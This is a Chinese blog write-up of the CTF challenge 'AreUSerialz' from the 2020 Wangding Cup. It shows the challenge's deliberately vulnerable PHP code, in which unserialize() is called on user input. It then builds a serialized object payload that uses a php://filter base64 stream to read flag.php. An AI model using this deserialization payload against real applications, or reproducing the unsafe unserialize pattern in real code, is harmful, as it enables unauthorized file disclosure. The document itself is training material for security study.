[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-06-14 09:22:46 发布
最新推荐文章于 2024-06-14 09:22:46 发布
阅读量1k 收藏 25
点赞数 20
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74790320/article/details/135613493
版权
文章讨论了在PHP代码审计中,如何利用序列化功能绕过is_valid函数的限制,通过构造函数和文件操作来获取flag。重点提及了魔术方法、类的封装以及PHP版本对属性类型的处理。
摘要由CSDN通过智能技术生成

题目:

给了一个代码审计部分:

 <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

首先这个题目给出的是AreUSerialz,所以一看就知道跟序列化有关的。

代码分析:

1.类之外的函数

本人喜欢先看类之外的函数,因为类太繁杂而且主要第一步运行的不就是类外函数吗?

这里可以看出我们传入了一个str参数,用url?str=进行传参
然后调用了is_valid函数,

is_valid函数说明了我们字符串str里面所有字符必须是ascill码中32到125之间的字符

有需要的大家就自己找吧ascii字符表

然后就会调用反序列化函数unseralize();

2.类及其类内函数


上面的construct会调用process函数,然后这些函数会按顺序执行,执行哪些参考op参数


相关知识点:

1.魔术方法;

php代码中的类,如果函数是以下划线_开头的,就是会自动调用的函数

如本题中的


这些都是会自动调用的,所以你就会知道为什么他只是调用了反序列化,但是为什么还能执行类里面的函数,因为自动调用了construct,然后construct里面调用了process函数

2.类的封装的序列化

protected/private类型的属性序列化后产生不可打印字符,public类型则不会。

所以本题里面有个is_valid(),如果你序列化时用的是protected,或者private的话,你生成的序列化会出现一些乱码,就是不可打印的字符串

3.PHP版本问题

PHP7.1+对类的属性类型不敏感。

所以可以把protected改为public

解题路线:

首先一看我们需要传入一个str的字符串,然后这些字符里面不能出现ascii码32到125之外的字符

然后我们自动调用了构造函数construct,因为构造函数的写法是_construct,所以生成的时候会自动调用

然后construct函数里面调用了process函数

这里会有三个分支,但是我们大胆猜测第二个才是我们要的,其实也能一个一个看,但是我懒得写了。我给出的理由是,第一它读,我猜他读的是文件地址,输出是输出我们所需要的文件,所以这部分是我们需要利用的

可以看到file_get_contents(),这不是很容易想到伪文件读取协议吗

然后我们将读取的文件输出出来

实际解题方式:

1.构造序列化

刚说了protected和private连个会产生不可打印字符,我们试一下,刚才逻辑下来我们已知我们op参数要为2,并且filename那里可以用伪文件读取协议

我这里不知道为什么没显示出来,但是确实会出现不可输出的符号

然后我们转用public

构造序列化的代码如下:

<?php
class FileHandler{
    public $op=2;
    public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;
}
$a=new FileHandler();
$b=serialize($a);
echo($b);
?> 


O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

然后我们将序列化后的作为str的参数传进去就可以获得一串base64编码后的flag

2.传参

PD9waHAgJGZsYWc9J2ZsYWd7NDdjNjQ1MmUtNGUyMi00ODMzLTk0ZDUtYmYwNTI4ZmFiYzhmfSc7Cg==

3.base64解码

然后就可以提交flag了

bK_Rose
关注
  • 20
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[杯 2020 龙组]AreUSerialz 1
bazzza的博客
12-21 2176
打开靶场,是一道php代码审计的题目,是个反序列化的题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
2020龙组Boom
05-12
2020龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
[杯 2020 龙组]AreUSerialz1
陈艺秋的博客
07-05 672
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
[杯 2020 龙组]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3033
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
BUUCTF [杯 2020 龙组]AreUSerialz
m0_49025459的博客
05-02 675
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() {//魔术字符 $op = "1"; $filename = "/tmp/tmpfile"; $content.
buuctf-[杯 2020 龙组]AreUSerialz(小宇特详解)
小宇的web博客
01-28 2724
buuctf-[杯 2020 龙组]AreUSerialz(小宇特详解) <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op;//protected受保护的修饰符,被定义为受保护的类成员则可以被其自身以及其子类和父类访问 protected $filename; protected $content; function _
【web | CTF】BUUCTF [杯 2020 龙组]AreUSerialz
weixin_46301214的博客
02-17 771
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的。看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行。奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊。天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了。天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境。
2020年龙组web AreUSerialz详解
永远是少年
12-20 622
今天继续给大家介绍CTF刷题,本文主要内容是2020年龙组web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
BUUCTF [杯 2020 龙组]AreUSerialz1
weixin_74410605的博客
08-20 334
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
[buuctf 杯 2020 龙组 AreUSerialz]
qq_41889600的博客
11-19 121
buuctf [杯 2020 龙组]AreUSerialz 1
龙组18道.rar
06-11
2020龙组的题目压缩包,里面已经分好类了。
2020年龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
20200510.龙组.zip
06-10
2020 5 10 龙组 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
2020龙组白虎组部分试题.rar
05-14
2020龙组白虎组部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次龙难度大于白虎。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 269
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 831
LAMP 架构是目前成熟的企业站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache站服务器、MySQL数据库服务器、PHP(或Perl、Python)页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 371
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级络管理员_07_络单选题
2301_80961833的博客
06-12 909
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域,下面的描述中错误的是()。
允许外访问龙面板
10-10
要允许外访问龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值